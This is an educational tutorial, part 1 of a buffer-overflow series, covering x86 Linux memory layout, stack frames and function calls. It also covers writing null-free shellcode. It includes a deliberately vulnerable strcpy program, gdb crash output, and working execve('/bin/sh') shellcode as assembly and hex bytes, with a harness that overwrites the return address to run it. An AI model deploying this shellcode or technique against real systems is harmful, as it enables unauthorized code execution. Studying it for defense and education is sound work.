Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode

Summary

This series covers stack-based buffer overflows and the techniques used to exploit this very common security flaw. Buffer overflow exploitation is considered one of the classic hacking techniques. The article is divided into 2 parts:

Part 1: Memory organization, the stack, function calls, shellcode. Introduces the memory organization of a process, the stack operations performed when a function is called, and the basic technique for creating shellcode, that is, code that launches a command-line interface (shell).

Part 2: Techniques for exploiting buffer overflows. Introduces the basic buffer overflow technique, how to organize the shellcode, how to determine the return address and the shellcode address, and how to pass the shellcode to the program.

The technical details illustrated here were produced in a Linux x86 environment (kernel 2.2.20, glibc-2.1.3), but in theory they apply to any other environment. Readers need basic knowledge of C programming, assembly, the gcc compiler and the gdb debugger (GNU Debugger).

If you have already learned how to exploit buffer overflows from other documents, this article can still help you consolidate that knowledge.

Introduction

To understand buffer overflows, how they work, and how they can be exploited, we start with an example of a program that contains one.

 /* vuln.c */
 #include <stdio.h>
 #include <string.h>

 int main(int argc, char **argv)
 {
     char buf[16];

     if (argc > 1) {
         strcpy(buf, argv[1]);   /* no bounds check: this is the bug */
         printf("%s\n", buf);
     }
 }

 [SkZ0@gamma bof]$ gcc -o vuln -g vuln.c
 [SkZ0@gamma bof]$ ./vuln AAAAAAAA // 8 A characters (1)
 AAAAAAAA
 [SkZ0@gamma bof]$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA // 24 A characters (2)
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 Segmentation fault (core dumped)

Running vuln with an argument of 8 A characters (1), the program works normally. With an argument of 24 A characters (2), the program crashes with a segmentation fault. The buffer buf can hold at most 16 bytes (15 characters plus the terminating null byte), so the 24 A characters have overflowed it.

 [SkZ0@gamma bof]$ gdb vuln -c core -q
 Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
 Program terminated with signal 11, Segmentation fault.
 Reading symbols from /lib/libc.so.6...done.
 Reading symbols from /lib/ld-linux.so.2...done.
 #0  0x41414141 in ?? ()
 (gdb) info register eip
 eip            0x41414141       1094795585
 (gdb)

The eip register, the instruction pointer, holds the value 0x41414141, which corresponds to 'AAAA' (the character A has the value 0x41 in hexadecimal). So it is possible to change the value of the instruction pointer by overflowing buf. Once a buffer overflow can be triggered, we can make the program execute arbitrary code by pointing eip at the starting address of that code.

To understand how the buffer overflow occurs, we will look in detail at a program's memory organization, the stack, and the function call mechanism.

1. Memory organization

1.1 Memory organization of a process

[Picture 1]

Each running process is given its own virtual (logical) address space by the operating system, and these spaces all have a similar layout. The address space consists of 3 areas: text, data and stack. Their meaning is as follows:

The text area is a fixed area that contains the executable code (instructions) and read-only data. It is shared between the processes running the same program file and corresponds to the text section of the executable file. The data in this area is read-only; any attempt to write to it causes a segmentation violation.

The data area contains initialized and uninitialized data. Global and static variables are stored in this area. The data area corresponds to the data and bss sections of the executable file.

The stack area is memory reserved at run time to hold the local variables of functions, the parameters passed to functions, and return values. The stack works on the "last in, first out" principle (LIFO), and its two most important instructions are PUSH and POP. In this article we focus only on the stack area.

1.2 Stack

A stack is an abstract data structure that supports LIFO operations.

The stack area is organized into stack frames, which are pushed when a function is called and popped when it returns. A stack frame contains the data a function needs: local variables, function parameters and the return value, plus the data needed to restore the previous stack frame, including the value of the instruction pointer at the time of the call.

The bottom of the stack is at a fixed address. The top of the stack is held in the "stack pointer" register (ESP, extended stack pointer). Depending on the implementation, the stack may grow from high addresses to low addresses or from low to high. In the following examples the stack grows from high addresses to low addresses, which is how the Intel architecture works. What the stack pointer (SP) points to also depends on the architecture: it can point to the last address used at the top of the stack, or to the next free address. In the following illustrations (Intel x86 architecture), SP points to the last address used at the top of the stack.

In theory, local variables in a stack frame can be accessed through their offset relative to SP. However, every push or pop changes SP, so these offsets would have to be recalculated, which is inefficient. Instead, compilers use a second register called the "base pointer" (EBP, extended base pointer) or "frame pointer" (FP). FP points to a fixed location in the stack frame, usually its first value. Local variables and parameters are accessed through offsets relative to FP, so they are not affected by later pushes and pops.

The basic storage unit on the stack is the word, which is 32 bits (4 bytes) on Intel x86 CPUs. (On Alpha or Sparc CPUs this value is 64 bits.) Every variable allocated on the stack occupies a multiple of the word size.

The stack is manipulated with 2 machine instructions:

push value: puts 'value' on top of the stack. It decreases %esp by 1 word and stores 'value' in that word.
pop dest: takes the value at the top of the stack and puts it in 'dest'. It copies the value pointed to by %esp into 'dest' and increases %esp by 1 word.

2. Functions and function calls

2.1 Introduction

To explain what the program does when it calls a function, we will use the following example program:

 /* fct.c */
 #include <stdio.h>

 void toto(int i, int j)
 {
     char str[5] = "abcde";
     int k = 3;
     j = 0;
     return;
 }

 int main(int argc, char **argv)
 {
     int i = 1;
     toto(1, 2);
     i = 0;
     printf("i=%d\n", i);
 }

A function call can be divided into 3 steps:

Prolog: on entry to a function, some preparation is done, such as saving the current state of the stack and allocating the memory the function needs.
Call: when the function is called, its parameters are placed on the stack and the instruction pointer (IP) is saved so that execution can resume at the right place after the function returns.
Epilog: the state that existed before the function call is restored.

2.2. Prolog

A function always starts with the following machine instructions:

 push %ebp
 mov %esp,%ebp
 sub $0xNN,%esp    // (the value 0xNN depends on the function)

These three instructions are called the prolog of the function. The following figures explain the prolog of the toto() function and the values of %esp and %ebp.

[Picture 2]

Suppose that initially %ebp points to some address X in memory and %esp points to a lower address Y. Before entering the function, the environment of the current stack frame must be saved. Since every value in a stack frame can be referenced through %ebp, we only need to save %ebp. Because %ebp is pushed onto the stack, %esp decreases by 1 word. The value of %ebp pushed onto the stack is called the "saved frame pointer" (SFP).

[Picture 3]

The second instruction sets up the new environment by making %ebp point to the top of the stack (the first value of the new stack frame). Now %ebp and %esp point to the same address (Y - 1 word).

[Picture 4]

The third instruction allocates memory for the local variables. The character array is 5 bytes long, but the stack is allocated in words, so the array receives the smallest multiple of the word size that is greater than or equal to its size, which is 8 bytes (2 words). The integer variable k takes 4 bytes, so the space reserved for local variables is 8 + 4 = 12 bytes (3 words). It is allocated by decreasing %esp by 0xc (12 in hexadecimal).

Note that local variables always have a negative offset relative to the base pointer %ebp. The machine instruction that performs the assignment i = 0 in main() illustrates this. The assembly code uses indirect addressing to locate i:

 movl $0x0,0xfffffffc(%ebp)

0xfffffffc is the two's complement representation of the integer -4. The instruction means: store the value 0 in the variable located at offset -4 bytes from %ebp. i is the first local variable of main() and is located 4 bytes right below %ebp.

2.3. Call

Like the prolog, this step prepares an environment, one that lets the caller pass parameters to the called function and lets execution return to the caller when the function ends.

[Picture 5]

Before the function is called, its parameters are placed on the stack in reverse order, so the last parameter is pushed first. In the example above, the value 2 is pushed first, then the value 1. %eip holds the address of the next instruction to execute, in this case the call instruction.

[Picture 6]

When the call instruction executes, %eip takes the address of the instruction that immediately follows the call (in the figure this value is Z + 5, because the call instruction occupies 5 bytes on the Intel x86 CPU). The call instruction then saves the value of %eip so that execution can continue there after the function returns. This is done by an implicit instruction that places %eip on the stack:

 push %eip

The value saved on the stack is called the "saved instruction pointer" (SIP), or "return address" (RET).

The value passed as the operand of the call instruction is the address of the first prolog instruction of toto(). This value is copied into %eip and becomes the next instruction executed.

Note that inside a function, the parameters and the return address have a positive offset relative to the base pointer %ebp. The machine instruction that performs the assignment j = 0 illustrates this. The assembly code uses indirect addressing to access j:

 movl $0x0,0xc(%ebp)

0xc is the integer 12. The instruction means: store the value 0 in the variable located at offset +12 bytes from %ebp. j is the second parameter of toto() and is located 12 bytes above %ebp (4 bytes for the saved %ebp, 4 for RET and 4 for the first parameter).

2.4. Epilog

Leaving a function is done in 2 steps. First, the environment created for the function is cleaned up (that is, the values of %ebp and %eip are restored). Then the stack is cleaned of the data that belonged to the function call.

The first step is performed inside the function by 2 instructions:

 leave
 ret

The second step is performed by the caller, which cleans up the stack area used for the parameters of the called function.

We continue the example above with the function toto().

[Picture 7]

Here we describe the initial situation more fully, before the call and the prolog. Before the call instruction, %ebp is at address X and %esp at address Y on the stack. Starting from Y, space is allocated in turn for the parameters, the saved values of %eip and %ebp, and the local variables of the function. The next instruction executed is leave, which is equivalent to the following two instructions:

 mov %ebp,%esp
 pop %ebp

[Picture 8]

The first instruction makes %esp point to the same location as %ebp. The second takes the value at the top of the stack and places it in %ebp. After the leave instruction, the stack is back in the state it was in before the prolog.

[Picture 9]

The ret instruction restores %eip so that the caller continues with the instruction that follows the call. To do this, the value at the top of the stack is popped and placed in %eip.

We are not yet back in the original state, because the parameters passed to the function have not been removed from the stack. They are removed by the next instruction, at address Z + 5, which is now in %eip.

[Picture 10]

Parameters are placed on the stack, and removed from it, by the caller. This is illustrated in the figure by the instruction:

 add $0x8,%esp

This instruction moves %esp back toward the bottom of the stack by the number of bytes used by the parameters of toto(). %ebp and %esp are now in the same state as before the call. Only the value of %eip has moved on to the next instruction.

Compile the example program and disassemble it with gdb to see the assembly code that corresponds to the steps described above.

 [SkZ0@gamma bof]$ gcc -g -o fct fct.c
 [SkZ0@gamma bof]$ gdb fct -q
 (gdb) disassemble main                    // function main
 Dump of assembler code for function main:
 0x80483e0 <main>:     push %ebp                    // prolog
 0x80483e1 <main+1>:   mov %esp,%ebp
 0x80483e3 <main+3>:   sub $0x4,%esp
 0x80483e6 <main+6>:   movl $0x1,0xfffffffc(%ebp)
 0x80483ed <main+13>:  push $0x2                    // call
 0x80483ef <main+15>:  push $0x1
 0x80483f1 <main+17>:  call 0x80483b4 <toto>
 0x80483f6 <main+22>:  add $0x8,%esp                // return from toto()
 0x80483f9 <main+25>:  movl $0x0,0xfffffffc(%ebp)
 0x8048400 <main+32>:  mov 0xfffffffc(%ebp),%eax
 0x8048403 <main+35>:  push %eax                    // call
 0x8048404 <main+36>:  push $0x804846e
 0x8048409 <main+41>:  call 0x8048308 <printf>
 0x804840e <main+46>:  add $0x8,%esp                // return from printf()
 0x8048411 <main+49>:  leave                        // return from main()
 0x8048412 <main+50>:  ret
 0x8048413 <main+51>:  nop
 End of assembler dump.
 (gdb) disassemble toto                    // function toto
 Dump of assembler code for function toto:
 0x80483b4 <toto>:     push %ebp                    // prolog
 0x80483b5 <toto+1>:   mov %esp,%ebp
 0x80483b7 <toto+3>:   sub $0xc,%esp
 0x80483ba <toto+6>:   mov 0x8048468,%eax
 0x80483bf <toto+11>:  mov %eax,0xfffffff8(%ebp)
 0x80483c2 <toto+14>:  mov 0x804846c,%al
 0x80483c8 <toto+20>:  mov %al,0xfffffffc(%ebp)
 0x80483cb <toto+23>:  movl $0x3,0xfffffff4(%ebp)
 0x80483d2 <toto+30>:  movl $0x0,0xc(%ebp)
 0x80483d9 <toto+37>:  jmp 0x80483dc <toto+40>
 0x80483db <toto+39>:  nop
 0x80483dc <toto+40>:  leave                        // return from toto()
 0x80483dd <toto+41>:  ret
 0x80483de <toto+42>:  mov %esi,%esi
 End of assembler dump.
 (gdb)

3. Shellcode

When a buffer overflow occurs, we can manipulate the stack, overwrite the return address RET and make the program execute arbitrary code. The simplest approach is to make the program run a piece of code that launches a command-line shell. Because this code is injected directly into the memory of the running program, it must be written in assembly language. Code of this type is usually called shellcode.

3.1. Writing the shellcode in C

The purpose of the shellcode is to launch a command-line shell. We first write it in C:

 /* shellcode.c */
 #include <stdio.h>
 #include <unistd.h>

 int main()
 {
     char *name[] = {"/bin/sh", NULL};
     execve(name[0], name, NULL);
     _exit(0);
 }

Among the exec() family of functions used to run another program, execve() is the one to use. The reason is that execve() is a system call, unlike the other exec() functions, which are implemented in libc on top of execve(). A system call is made through an interrupt, with the parameter values placed in predetermined registers, so the resulting assembly code is short.

Furthermore, if the call to execve() succeeds, the calling program is replaced by the called program, which starts executing from its beginning. If the call to execve() fails, the calling program continues to run. When exploiting a vulnerability, the shellcode is injected into the middle of the execution of the vulnerable program. After our code has run, letting the program continue is unnecessary and can have unintended results, because the contents of the stack have been changed. Execution should therefore end as soon as possible. Here we use _exit() rather than exit(), because exit() is a libc library function built on top of the _exit() system call.

Recall the parameters passed to execve():

the address of the string /bin/sh
the address of the parameter array (terminated by a NULL pointer)
the address of the environment variable array (here a NULL pointer)

3.2. Disassembling the functions

Compile shellcode.c with the debug and static options, so that the library functions are linked into the program.

 [SkZ0@gamma bof]$ gcc -o shellcode shellcode.c -O2 -g --static

Now look at the assembly code of main() with gdb.

 [SkZ0@gamma bof]$ gdb shellcode -q
 (gdb) disassemble main
 Dump of assembler code for function main:
 0x804818c <main>:     push %ebp
 0x804818d <main+1>:   mov %esp,%ebp
 0x804818f <main+3>:   sub $0x8,%esp
 0x8048192 <main+6>:   movl $0x0,0xfffffff8(%ebp)
 0x8048199 <main+13>:  movl $0x0,0xfffffffc(%ebp)
 0x80481a0 <main+20>:  mov $0x806f388,%edx
 0x80481a5 <main+25>:  mov %edx,0xfffffff8(%ebp)
 0x80481a8 <main+28>:  push $0x0
 0x80481aa <main+30>:  lea 0xfffffff8(%ebp),%eax
 0x80481ad <main+33>:  push %eax
 0x80481ae <main+34>:  push %edx
 0x80481af <main+35>:  call 0x804c6ec <__execve>
 0x80481b4 <main+40>:  push $0x0
 0x80481b6 <main+42>:  call 0x804c6d0 <_exit>
 End of assembler dump.
 (gdb)

Note the following instruction:

 0x80481a0 <main+20>: mov $0x806f388,%edx

This instruction loads an address into %edx.

 (gdb) printf "%s\n", 0x806f388
 /bin/sh
 (gdb)

So the address of the string "/bin/sh" is placed in %edx. Before calling the lower-level C library function that implements the execve() system call, the parameters are pushed onto the stack in this order:

NULL pointer

 0x80481a8 <main+28>: push $0x0

address of the parameter array

 0x80481aa <main+30>: lea 0xfffffff8(%ebp),%eax
 0x80481ad <main+33>: push %eax

address of the string /bin/sh

 0x80481ae <main+34>: push %edx

Now look at the execve() and _exit() functions:

 (gdb) disassemble __execve
 Dump of assembler code for function __execve:
 0x804c6ec <__execve>:     push %ebp
 0x804c6ed <__execve+1>:   mov %esp,%ebp
 0x804c6ef <__execve+3>:   push %edi
 0x804c6f0 <__execve+4>:   push %ebx
 0x804c6f1 <__execve+5>:   mov 0x8(%ebp),%edi
 0x804c6f4 <__execve+8>:   mov $0x0,%eax
 0x804c6f9 <__execve+13>:  test %eax,%eax
 0x804c6fb <__execve+15>:  je 0x804c702
 0x804c6fd <__execve+17>:  call 0x0
 0x804c702 <__execve+22>:  mov 0xc(%ebp),%ecx
 0x804c705 <__execve+25>:  mov 0x10(%ebp),%edx
 0x804c708 <__execve+28>:  push %ebx
 0x804c709 <__execve+29>:  mov %edi,%ebx
 0x804c70b <__execve+31>:  mov $0xb,%eax
 0x804c710 <__execve+36>:  int $0x80
 0x804c712 <__execve+38>:  pop %ebx
 0x804c713 <__execve+39>:  mov %eax,%ebx
 0x804c715 <__execve+41>:  cmp $0xfffff000,%ebx
 0x804c71b <__execve+47>:  jbe 0x804c72b
 0x804c71d <__execve+49>:  call 0x80482b8
 0x804c722 <__execve+54>:  neg %ebx
 0x804c724 <__execve+56>:  mov %ebx,(%eax)
 0x804c726 <__execve+58>:  mov $0xffffffff,%ebx
 0x804c72b <__execve+63>:  mov %ebx,%eax
 0x804c72d <__execve+65>:  lea 0xfffffff8(%ebp),%esp
 0x804c730 <__execve+68>:  pop %ebx
 0x804c731 <__execve+69>:  pop %edi
 0x804c732 <__execve+70>:  leave
 0x804c733 <__execve+71>:  ret
 End of assembler dump.
 (gdb) disassemble _exit
 Dump of assembler code for function _exit:
 0x804c6d0 <_exit>:     mov %ebx,%edx
 0x804c6d2 <_exit+2>:   mov 0x4(%esp,1),%ebx
 0x804c6d6 <_exit+6>:   mov $0x1,%eax
 0x804c6db <_exit+11>:  int $0x80
 0x804c6dd <_exit+13>:  mov %edx,%ebx
 0x804c6df <_exit+15>:  cmp $0xfffff001,%eax
 0x804c6e4 <_exit+20>:  jae 0x804ca80
 End of assembler dump.
 (gdb) quit

A system call is made by triggering interrupt 0x80, at address 0x804c710 for execve() and 0x804c6db for _exit(). The interrupt is the same for every system call; what distinguishes one call from another is the content of the %eax register. As seen above, this value is 0xb for execve() and 0x1 for _exit().

[Picture 11]
Figure 4: execve function and parameter

Analyzing the assembly code above, we draw the following conclusions:

Before the __execve() function makes the system call with interrupt 0x80:
1. %edx holds the address of the environment variable array:
```
 0x804c705 <__execve+25>: mov 0x10(%ebp),%edx
```
  For simplicity, we will use an empty environment by setting this value to a NULL pointer.
2. %ecx holds the address of the parameter array:
```
 0x804c702 <__execve+22>: mov 0xc(%ebp),%ecx
```
  The first parameter must be the name of the program, so the array simply contains the address of the string "/bin/sh" followed by a NULL pointer.
3. %ebx holds the address of the string naming the program to execute, in this case "/bin/sh":
```
 0x804c6f1 <__execve+5>: mov 0x8(%ebp),%edi
 ...
 0x804c709 <__execve+29>: mov %edi,%ebx
```
The _exit() function ends the process. The exit code returned to the parent process (usually a shell) is stored in %ebx:
```
 0x804c6d2 <_exit+2>: mov 0x4(%esp,1),%ebx
```

To finish the assembly code, we need a place that holds the string "/bin/sh", a pointer to this string, and a NULL pointer (which terminates the parameter array and also serves as the environment pointer). All of this data must be prepared before execve() is called.

3.3. Locating the shellcode in memory

Shellcode is usually injected into the vulnerable program through command-line parameters, environment variables, or strings read from the keyboard or a file. In all cases, when we create the shellcode we cannot know the address at which it will end up. Yet the shellcode needs the address of the string "/bin/sh". With a few tricks we can solve this problem. There are two ways to locate the shellcode's data in memory, both based on indirect addressing so that the code does not depend on its location. For simplicity, we show here the method that uses the stack.

To prepare the parameter array and the environment pointer for execve(), we place the string "/bin/sh" and the NULL pointer on the stack and obtain their addresses from the value of the %esp register. The assembly code has the following form:

 beginning_of_shellcode:
     pushl $0x0          // null value that terminates /bin/sh
     pushl "/bin/sh"     // the string /bin/sh
     movl %esp,%ebx      // %ebx contains the address of /bin/sh
     push NULL           // NULL pointer of the parameter array
     ...
     (assembly code of the shellcode)

3.4. The null byte problem

Vulnerable functions are usually string handling functions such as strcpy() or scanf(). To be injected into the program, the shellcode must be copied as a string. However, string functions stop as soon as they encounter a null character ('\0'). Our shellcode must therefore not contain any null byte. We use a few tricks to eliminate them. For example:

 push $0x00

is replaced by the equivalent:

 xorl %eax,%eax
 push %eax

That is how null bytes that appear explicitly are handled. Null bytes also appear when instructions are converted to machine code. For example, the instruction that loads the value 0x1 into %eax to call _exit():

 0x804c6d6 <_exit+6>: mov $0x1,%eax

is encoded in hexadecimal as:

 b8 01 00 00 00    mov $0x1,%eax

The trick is to set %eax to 0 first and then increment it to 1 (or to use movb, which operates on the low byte of %eax):

 31 c0    xor %eax,%eax
 40       inc %eax

3.5. Creating the shellcode

We now have everything we need to create the shellcode. The program that contains it:

 /* shellcode_asm.c */
 int main()
 {
     asm(
         /* push the null value that terminates /bin//sh */
         "xorl %eax,%eax\n\t"
         "pushl %eax\n\t"
         /* push the string /bin//sh */
         "pushl $0x68732f2f\n\t"   /* string //sh, 1 word long */
         "pushl $0x6e69622f\n\t"   /* string /bin */
         /* %ebx contains the address of /bin//sh */
         "movl %esp,%ebx\n\t"
         /* push the NULL pointer, second element of the parameter array */
         "pushl %eax\n\t"
         /* push the address of /bin//sh, first element of the parameter array */
         "pushl %ebx\n\t"
         /* %ecx contains the address of the parameter array */
         "movl %esp,%ecx\n\t"
         /* %edx contains the address of the environment array, a NULL pointer */
         /* (the equivalent cdq instruction could be used, 1 byte shorter) */
         "movl %eax,%edx\n\t"
         /* execve(): %eax = 0xb */
         "movb $0xb,%al\n\t"
         /* make the system call */
         "int $0x80\n\t"
         /* return value 0 for _exit() */
         "xorl %ebx,%ebx\n\t"
         /* _exit(): %eax = 0x1 */
         "xorl %eax,%eax\n\t"
         "incl %eax\n\t"
         /* make the system call */
         "int $0x80"
     );
 }

Compile the program above and dump its machine code:

 [SkZ0@gamma bof]$ gcc -o shellcode_asm shellcode_asm.c
 [SkZ0@gamma bof]$ objdump -d shellcode_asm | grep \<main\>: -A 17
 08048380 <main>:
  8048380: 55              pushl %ebp
  8048381: 89 e5           movl %esp,%ebp
  8048383: 31 c0           xorl %eax,%eax
  8048385: 50              pushl %eax
  8048386: 68 2f 2f 73 68  pushl $0x68732f2f
  804838b: 68 2f 62 69 6e  pushl $0x6e69622f
  8048390: 89 e3           movl %esp,%ebx
  8048392: 50              pushl %eax
  8048393: 53              pushl %ebx
  8048394: 89 e1           movl %esp,%ecx
  8048396: 89 c2           movl %eax,%edx
  8048398: b0 0b           movb $0xb,%al
  804839a: cd 80           int $0x80
  804839c: 31 db           xorl %ebx,%ebx
  804839e: 31 c0           xorl %eax,%eax
  80483a0: 40              incl %eax
  80483a1: cd 80           int $0x80

Test the shellcode above:

 /* testsc.c */
 char shellcode[] =
     "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50"
     "\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

 int main()
 {
     int *ret;

     /* overwrite the saved %eip on the stack with the address of the shellcode */
     /* it lies 8 bytes (2 words) from the ret variable: */
     /* - 4 bytes for the ret variable */
     /* - 4 bytes for the saved %ebp */
     *((int *)&ret + 2) = (int)shellcode;

     return (0);
 }

Run the testsc program:

 [SkZ0@gamma bof]$ gcc testsc.c -o testsc
 [SkZ0@gamma bof]$ ./testsc
 bash$ exit
 [SkZ0@gamma bof]$

We can extend the shellcode to perform other operations before launching "/bin/sh", such as setuid(), setgid(), chroot(), and so on, by inserting the assembly code of these calls before the shellcode above.

The shellcode test above already shows the basic idea behind exploiting a buffer overflow. The details are presented in the next part.

Marvin Fry

Update 26 May 2019
